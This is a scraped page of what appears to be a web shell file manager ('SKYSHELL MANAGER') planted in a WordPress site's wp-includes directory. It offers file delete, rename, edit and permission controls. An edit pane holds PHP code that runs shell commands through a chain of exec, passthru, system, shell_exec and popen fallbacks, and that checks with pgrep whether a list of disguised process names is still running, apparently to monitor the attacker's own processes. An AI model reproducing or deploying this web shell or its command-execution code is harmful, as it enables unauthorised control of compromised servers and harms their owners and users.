📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
38401.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: .val
<?php $files = ['str_ireplace','ele_check','aboutpage','class.auth','xoops13_header','imatgelogin','block.textformat','UnderSoftEngin','affiliate','editApplication','pj_toolbar_php','loggedout','noncomp_opener','level_mod','config_site','uploadPDF','about.german3','tcpdf_config','plugin_functions','beanstream_usd','multicontent','pcltar.lib','listtemplates','data_role_cache','rsform.html','salemaker','masterRegistEN','germanf_mimes','toolbar.cache','arabic_mimes']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }
Save